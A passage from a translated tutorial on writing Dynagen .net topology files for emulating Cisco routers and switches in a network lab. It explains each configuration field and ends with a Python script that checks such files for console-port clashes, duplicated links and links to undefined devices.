This time we use a 3640 IOS. Note: to emulate a manageable switch you must use a 3600-series IOS, and the higher the version the better, otherwise the required module is not supported.
model = 3640
console = 3001
Defines the login port as 3001.
ram = 128
confreg = 0x2102
idlepc = 0x60fe8088
exec_area = 64
mmap = true
slot0 = NM-1FE-TX 36-series 1-port Fast Ethernet module, described above.
slot1 = NM-16ESW 36-series 16-port Fast Ethernet module; emulating a manageable switch depends on it.
f0/0 = SW9 3 The local f0/0 is connected to port 3 of the device named SW9.
f1/11 = PC1 f0/0 The local f1/11 is connected to port f0/0 of the device named PC1.
[[router PC1]]
This device is called PC1; we use a router to emulate a PC. You can emulate several and connect them to the switch to practice VLAN configuration; here there is just one.
image = D:\cisco IOS rom\ios\c3640-i-mz.112-20.P.bin
There are no real requirements for this IOS; the smaller the better. We only need it to have an Ethernet port, and we use no features beyond ping and trace.
model = 3640
console = 4001
Virtual PCs start from port 4001.
ram = 32
As long as it runs, the less memory the better.
confreg = 0x2102
idlepc = 0x6017144c
exec_area = 32
mmap = true
slot0 = NM-1FE-TX Just this one module.
[[ATMSW AT1]]
ATMSW in front means this device is an ATM switch; AT1 after it is its name, so that others can connect to it. This device is not manageable, like an ISP's equipment.
1:1:100 = 2:2:200
These should be ATM parameters, but I have not learned ATM yet, so I do not know what these values mean. To be filled in after I learn it. (In Dynagen's ATM switch syntax each side of the = reads port:VPI:VCI, so this line maps VPI 1 / VCI 100 on port 1 to VPI 2 / VCI 200 on port 2.)
[[ethsw SW9]]
ethsw in front means this device is an Ethernet switch; SW9 after it is its name, so that others can connect to it. This device is likewise not manageable.
1 = dot1q 1 Port 1, 802.1Q trunk, native VLAN 1.
2 = dot1q 1 Port 2, 802.1Q trunk, native VLAN 1.
3 = dot1q 1 Port 3, 802.1Q trunk, native VLAN 1.
4 = access 1 NIO_gen_eth:\Device\NPF_{DE5D9A8A-6CC2-4F44-BEC4-4FC0EEEB566C}
This is your physical PC's network card; it is as if your NIC were plugged into this virtual switch. I recommend setting the NIC up this way.
[[FRSW FR1]]
FRSW in front means this device is a frame relay switch; FR1 after it is its name, so that others can connect to it. This device is not manageable either.
1:102 = 2:201
These should be the frame relay switch's virtual circuits; I do not yet understand frame relay thoroughly, to be filled in later. (In Dynagen's syntax each side reads port:DLCI, so DLCI 102 on port 1 is switched to DLCI 201 on port 2.)
*****************************************************************************
Also note that in the configuration file you can use "#" to comment out configuration statements.
For example: # slot0 = NM-1FE-TX #36-series 1-port Fast Ethernet module
That is the .net file; now we can build our own topologies.
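The rules spelled out above (console ports must be unique, a link is written on one end only, a link must point at a device that exists) are easy to break by hand, and Dynagen only tells you at start-up. Here is an added example, not part of the original post or of Dynagen, that parses the .net format as described here ([[type name]] device blocks, [[model]] default blocks, [host] blocks, key = value lines, "#" comments, router link lines of the form port = PEER PORT) and reports those mistakes. The sample file embedded in it is constructed for the example and deliberately contains all three errors.

```python
"""Parse a Dynagen .net file and check it for the mistakes the walkthrough
warns about.  Added example, not part of the original post or of Dynagen."""
import re
from collections import defaultdict

DEVICE_RE = re.compile(r"^\[\[(\w+)\s+(\S+)\]\]$")   # [[router R1]], [[ethsw SW9]]
DEFAULT_RE = re.compile(r"^\[\[(\w+)\]\]$")          # [[3640]] per-model defaults
HOST_RE = re.compile(r"^\[([^\[\]]+)\]$")           # [localhost], [localhost:7200]
IFACE_RE = re.compile(r"^[a-z]+\d+/\d+$")           # f0/0, s1/1, a2/0


def parse_net(text: str) -> dict:
    """Return {name: {"type": ..., "opts": {...}, "links": [(local, peer, peer_port)]}}."""
    devices, current, name = {}, None, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()           # '#' starts a comment
        if not line:
            continue
        m = DEVICE_RE.match(line)
        if m:
            dtype, name = m.group(1).lower(), m.group(2)
            if name in devices:
                raise ValueError("device %s is defined twice" % name)
            current = devices[name] = {"type": dtype, "opts": {}, "links": []}
            continue
        if DEFAULT_RE.match(line) or HOST_RE.match(line):
            current = None                            # defaults or host block
            continue
        if "=" not in line:
            raise ValueError("cannot parse line: %r" % raw)
        key, value = (s.strip() for s in line.split("=", 1))
        if current is None:
            continue                                  # autostart, udp, default image ...
        if current["type"] == "router" and IFACE_RE.match(key):
            parts = value.split()                     # link line: PEER PORT
            if len(parts) != 2:
                raise ValueError("link %r on %s must read 'PEER PORT'" % (line, name))
            current["links"].append((key, parts[0], parts[1]))
        else:
            current["opts"][key] = value
    return devices


def check_net(devices: dict) -> list:
    """Findings as strings; an empty list means the file passed."""
    findings, consoles = [], defaultdict(list)
    for name, dev in devices.items():
        if "console" in dev["opts"]:
            consoles[dev["opts"]["console"]].append(name)
    for port, names in sorted(consoles.items()):
        if len(names) > 1:
            findings.append("console %s shared by %s" % (port, ", ".join(sorted(names))))
    ends, targets = {}, defaultdict(list)        # (dev, port) -> peer; peer -> users
    for name, dev in devices.items():
        for local, peer, peer_port in dev["links"]:
            if peer not in devices:
                findings.append("%s %s links to undefined device %s" % (name, local, peer))
            elif (name, local) in ends:
                findings.append("%s %s is linked twice" % (name, local))
            else:
                ends[(name, local)] = (peer, peer_port)
                targets[(peer, peer_port)].append((name, local))
    reported = set()
    for (name, local), (peer, peer_port) in ends.items():
        if ends.get((peer, peer_port)) == (name, local):     # peer repeats the link
            pair = frozenset([(name, local), (peer, peer_port)])
            if pair not in reported:
                reported.add(pair)
                findings.append("link %s %s <-> %s %s is defined on both ends"
                                % (name, local, peer, peer_port))
    for (peer, peer_port), users in targets.items():
        if len(users) > 1:                              # same switch port used twice
            findings.append("%s %s is used by %s" % (peer, peer_port,
                            " and ".join("%s %s" % u for u in users)))
    return findings


# Constructed sample with three deliberate errors (see the comments).
SAMPLE_NET = """\
autostart = false
[localhost]
port = 7200
udp = 10000
[[3640]]
image = D:\\ios\\c3640-jk9o3s-mz.124-10a.bin
[[router R1]]
model = 3640
console = 2001
slot0 = NM-1FE-TX
slot1 = NM-4T
f0/0 = SW9 1
s1/1 = R2 s3/0
s1/2 = FR1 1
[[router R2]]
model = 7200
console = 2001 # clashes with R1
slot3 = PA-4T
f0/0 = SW9 2
s3/0 = R1 s1/1 # already defined on R1
s3/1 = R9 s0/0 # R9 does not exist
[[ethsw SW9]]
1 = dot1q 1
2 = dot1q 1
[[FRSW FR1]]
1:102 = 2:201
"""

if __name__ == "__main__":
    for finding in check_net(parse_net(SAMPLE_NET)):
        print(finding)
```

Switch blocks (ethsw, FRSW, ATMSW) are kept as plain options because their lines describe ports and circuits rather than links to other devices; only router blocks contribute link entries, which is also why a link must be written on the router side.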